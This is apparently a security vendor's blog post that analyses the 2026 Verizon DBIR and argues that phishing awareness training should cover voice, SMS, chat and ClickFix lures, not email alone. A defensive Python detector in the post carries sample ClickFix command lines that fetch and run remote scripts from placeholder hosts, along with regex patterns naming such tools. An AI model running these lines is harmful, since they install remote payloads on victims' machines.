TL;DR:
- The 2026 Verizon DBIR found that mobile-centric phishing simulations (voice, SMS, callback) had a median click rate roughly 40% higher than traditional email phishing simulations (2% vs. 1.4%).
- The sample size for non-email sims was 35 campaigns, versus 8,395 for email.
- That is not a small gap in coverage. That is an entire category of risk the security industry is barely measuring.
- 41% of social engineering breaches in the DBIR’s dataset involved a non-email vector: phones, social media, Teams chats, web-based ClickFix lures.
- Email is no longer “the” phishing channel. It’s just the one that’s easiest to instrument.
- Legacy awareness programs based on email-based phishing lures are actively training your employees on the least successful attack vector in your environment.
The 2026 DBIR said the quiet part out loud.
Every May, the security industry holds its collective breath while Verizon drops the “Data Breach Investigations Report”: over 100 pages of forensic analysis of what actually broke during the past year. Frankly, it is one of the most honest and comprehensive reports the cybersecurity industry produces.
That’s because the authors aren’t afraid to flag where their own data is thin. For example, buried in the Social Engineering section, the 2026 DBIR research team admits:
Phishing simulation is a well-established business practice, and we have a handful of leading companies in this space as data contributors. On the other hand, we struggled to find companies doing simulations of voice- and text message-based campaigns, which leads to this small-ish sample size. We hope that, for the 2027 DBIR, we will be able to collect more data as additional companies that offer these kinds of services want to participate in this research.
Read that carefully. The DBIR research team had 8,395 email phishing simulation campaigns to analyze (their chart uses one dot per roughly 210 campaigns)… but only 35 non-email simulation campaigns in total.
That roughly 240-to-1 ratio isn’t a coincidence. It’s the shape of an industry that built itself around the easiest thing to measure and then mistook that thing for the whole problem.
And yet, despite the tiny sample, mobile-centric phishing simulations still showed a higher median click rate than email: 2% vs. 1.4%, roughly 40% higher.

Be careful about what that proves. Thirty-five campaigns is a small sample, and the DBIR says so itself; treat the 40% gap as a direction, not a precise effect size. But the direction is the point: the channel the industry barely measures is the one where employees click more, which is exactly the gap a training program cannot afford to leave unmeasured.
Attackers are phishing outside the email inbox.
The DBIR’s own data shows that 41% of social engineering breaches now involve a vector other than email. That includes:
- Voice (vishing). Pretexting is up sharply this year, with the DBIR specifically calling out attackers impersonating help desk agents and users needing password resets “with moderate levels of success.”
  - Pretexting reached 6% of all breaches this year, driven in part by a notable number of high-profile ransomware incidents that used it as the initial access action.
- SMS (smishing). Mobile devices in large organizations get hit by a median of 48 SMS-based phishing campaigns per year (12 for smaller orgs), such as the currently popular OAuth code smishing lure.
  - That is a phishing attempt roughly every eight days, and it counts only what shows up on managed devices. Personal devices used for work are a black box, so the only control left is an employee who can recognize a fake text on any device.
- Messaging app pretexting. The “fake IT emergency” playbook the DBIR documents in detail goes something like this: the attacker floods the victim’s inbox with spam, then sends a “helpful” Microsoft Teams chat from “the help desk” offering to fix it. The victim hands over remote access, because the attacker has already won their trust and cooperation.
  - This “pretext before phishing attempt” pattern has replayed throughout the first half of 2026, from North Korea’s Slack-chat-to-fake-Zoom-call attack on the Axios supply chain to the pretext-to-voice-phishing authentication bypass attempts currently run by ShinyHunters. (Those start in email, admittedly, but they are still a good example of an attack pattern employees can be trained to recognize, as opposed to one-off lures.)
- Malvertising and SEO poisoning. Consider the ClickFix malware campaign, in which victims are tricked into pasting a malicious command into their own terminal, often disguised as a CAPTCHA “prove you’re human!” step. Many of these attacks arrive through malvertising, where attackers buy ad placements on social media or in search results that point to malicious content, or SEO poisoning, where legitimately ranking websites are compromised to serve ClickFix or other information-stealing malware.
  - With 2.7% of attacks blocked at the browser level, this vector may not be huge yet, but it is novel… and growing.
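To make the ClickFix bullet concrete for the people who have to catch it, here is an added example (not from the DBIR and not this post’s author’s code) of the check a SOC would run over process-creation telemetry. ClickFix only works if the user pastes and runs the command themselves, so the telltale is an interactive parent (explorer.exe, a terminal app) launching an interpreter whose command line fetches remote content and executes it. The field names, the example.invalid URLs, the indicator weights and every sample event are constructed assumptions, and the macOS terminal case generalizes beyond the terminal-paste lure the text describes.

```python
"""Flag ClickFix-style launches in process-creation telemetry.

Added example, not from the DBIR or this post. ClickFix lures persuade the
user to paste a command into a Run box or terminal, so the telltale is an
interactive parent (explorer.exe, a terminal app) launching an interpreter
whose command line fetches remote content and runs it. Field names, weights
and sample events are assumptions; tune them against your own telemetry.
"""
import re

# Processes a human types into. Anything else launching an interpreter is
# scripted or scheduled activity and is out of scope for this rule.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2", "gnome-terminal", "konsole"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "bash", "sh", "zsh"}

# (regex, weight, label). A lone URL or a -NoProfile flag is everyday admin
# noise; fetching AND executing remote content is what a pasted lure needs.
INDICATORS = [
    (r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl|wget)\b", 2, "remote fetch"),
    (r"\b(iex|invoke-expression)\b|\|\s*(ba)?sh\b|\$\(\s*curl", 2, "executes fetched content"),
    (r"mshta(\.exe)?\s+https?://", 2, "mshta loads remote HTA"),
    (r"captcha|i am not a robot|verification id|prove you", 2, "CAPTCHA decoy text"),
    (r"https?://", 1, "URL in command line"),
    (r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-enc(odedcommand)?\b", 1, "evasion flag"),
]
THRESHOLD = 3


def basename(path: str) -> str:
    """Last path component, lower-cased, for either Windows or POSIX paths."""
    return re.split(r"[\\/]", path)[-1].lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, matched labels) for one process-creation event."""
    if basename(event["parent"]) not in INTERACTIVE_PARENTS:
        return 0, []
    if basename(event["image"]) not in INTERPRETERS:
        return 0, []
    cmd = event["cmdline"].lower()
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, cmd):
            score += weight
            reasons.append(label)
    return score, reasons


def detect(events: list[dict]) -> list[tuple[int, int, list[str]]]:
    """Indices, scores and reasons of events that reach THRESHOLD."""
    hits = []
    for i, event in enumerate(events):
        score, reasons = score_event(event)
        if score >= THRESHOLD:
            hits.append((i, score, reasons))
    return hits


# Constructed sample events in Sysmon Event ID 1 / EDR style; not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",              # pasted into Win+R
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "irm https://example.invalid/verify | iex" '
                '# I am not a robot - reCAPTCHA Verification ID: 7391'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/captcha.hta"},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",   # IDE task, not interactive
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -File C:\dev\build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",              # user ran a local script: benign
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -File C:\Users\dev\build.ps1"},
    {"parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/bash",                              # macOS variant of the same lure
     "cmdline": 'bash -c "$(curl -fsSL https://example.invalid/fix-audio.sh)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c echo hello"},
]

if __name__ == "__main__":
    for idx, score, reasons in detect(SAMPLE_EVENTS):
        print(f"event {idx}: score {score} -> {', '.join(reasons)}")
```

The threshold is what keeps the everyday `powershell -NoProfile -File` launch from firing while the pasted fetch-and-execute one does; the macOS `curl | bash` case is the expected false positive (developer install scripts), which is why a real deployment pairs this rule with an allowlist of known installer hosts rather than lowering the weights.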
None of these touch the corporate email gateway. None of them get measured by any of the major awareness platforms running phishing simulations today, the ones with “integrated phishing simulation” prominently displayed on their product pages.
And when large organizations are hit by a mobile phishing campaign roughly every eight days, email-only training isn’t enough to secure anyone in 2026.

The “walled garden” problem encouraging email phishing simulations
So why have security vendors focused on email phishing simulations more than other channels? It’s not because email is the bigger threat. It’s because many awareness vendors own the inbox, which makes email lures the easiest social engineering type to simulate.
For a long time this wasn’t a problem: attackers preferred email, the standard and most easily spun-up lure, so everyone was happy with email phishing simulations.
- Vendors could own the simulation feedback loop from start to finish, analyzing real phish in the inbox to feed a growing (bloated) catalog of emails.
- Security teams liked that the legacy vendors plugged directly into their owned and managed feeds, making them feel like they could see (and control) everything.
- Auditors and compliance officers liked the neat data to check their framework box.
But that checkbox became a trap. The regulations are a relic of their time, when email was the predominant lure hitting organizations. If they were written today, the intent behind the frameworks would push those “email simulation” requirements to reflect the broader set of phishing vectors we see now.
For legacy security awareness vendors, their entire measurement apparatus lives inside a tidy, walled garden where the vendor controls the rails and security teams feel like they’re in control.
But in that walled garden model, everything outside the walls becomes somebody else’s problem, even as it ultimately creeps inside:
- Your employees sideloading insecure apps and browser extensions on personal devices for work because they hate the corporate options
- Private LinkedIn DMs from people asking to “get around” HR bureaucracy for a resume review
- The “authentication request” SMS messages they get while standing in line at Starbucks
- Your best developer joining another “company’s” Slack chat because they don’t feel valued or seen
The walled garden works for security vendors. It does not secure employees or their organizations from today’s social engineering attacks.
The DBIR puts it as politely as possible:
The takeaway reflection here is this: How are users taught to detect these unconventional social engineering attacks? Could you detect someone impersonating your help desk, and by what means can your users be reached on your devices?
I’ll be less polite: If your awareness program prioritizes email phishing lures over any other type of social engineering, you are not measuring human risk.
Instead, you’re measuring the easy thing, calling it human risk, and crossing your fingers that the actually-dangerous stuff happens in front of your email security gateway. (If other orgs’ data is anything to go by, it won’t.)
The personal-to-professional carryover compounds the problem.
As the 2026 DBIR notes in references to last year’s BYOD and infostealer analysis, employees commonly have corporate credentials sitting on personal devices. The social engineering channels attackers use to reach those devices are precisely the ones legacy awareness programs often fail to cover.
Your employees aren’t a 9-to-5 attack surface. Help them be discerning everywhere, or be ready to absorb the spillover.
What the 2026 DBIR research actually means for effective security awareness programs
A few concrete shifts to consider, in rough order of leverage:
- Audit your training topic mix. Stop training on yet another phishing lure format and start diversifying your training topics. A modern security awareness program must teach employees about relevant, current social engineering attempts of all types, from prompt injection and calendar invites to text-based and voice-based attacks.
  - If the 2026 DBIR’s dataset is representative, then email-only security awareness programs cover roughly 60% of the actual problem while calling it 100%.
- Stop using reporting rates as a proxy for behavior change. The pattern behind the DBIR’s numbers is employees who recognize email phish instantly because they have been drilled for fifteen years… and then get a phone call from “IT” and hand over the keys.
  - Pattern recognition in one channel won’t transfer to all of them, because the pretexting context changes.
- Engage with employees as whole humans. The personal-to-professional discernment carryover is real, and it’s the highest-leverage cultural work in human risk right now.
  - Talk to your employees about the scams targeting them personally, not just the ones targeting your corporate inbox.
- Push your vendors on modern social engineering tactics instead of focusing on email click rates. When a security awareness vendor brags about their email click rate trending down, ask them how they’ve helped employees identify the same urgency and reciprocity social engineering flags for voice phishing, or in text messages, or over social media DMs. If they can’t, and most can’t, then you’ve learned something useful about whose problem they think security really is.
One last thing about the 2026 DBIR: Please read it yourself.
Read the 2026 DBIR, and don’t just ask your AI tool of choice to process a summary.
Don’t stop at the executive summary or read someone else’s take on the report with their point of view (and yes, I’m aware of the irony).
Read the whole thing, especially the Social Engineering pattern (starts on p. 47) and the “Multipronged social approach” subsection.
It’s free (minus your email address), the writing is genuinely funny in places, and the methodology section will make you a better consumer of every other security report you read this year.



And if you’re curious about what some of these lures look like in real life (and what you could do to stop it), then check out Fable Security’s free ebook, “One ish, two ish: How to prevent modern phishing” to learn more about how modern phishing actually works across email, voice, text, and everything else attackers throw at your employees.

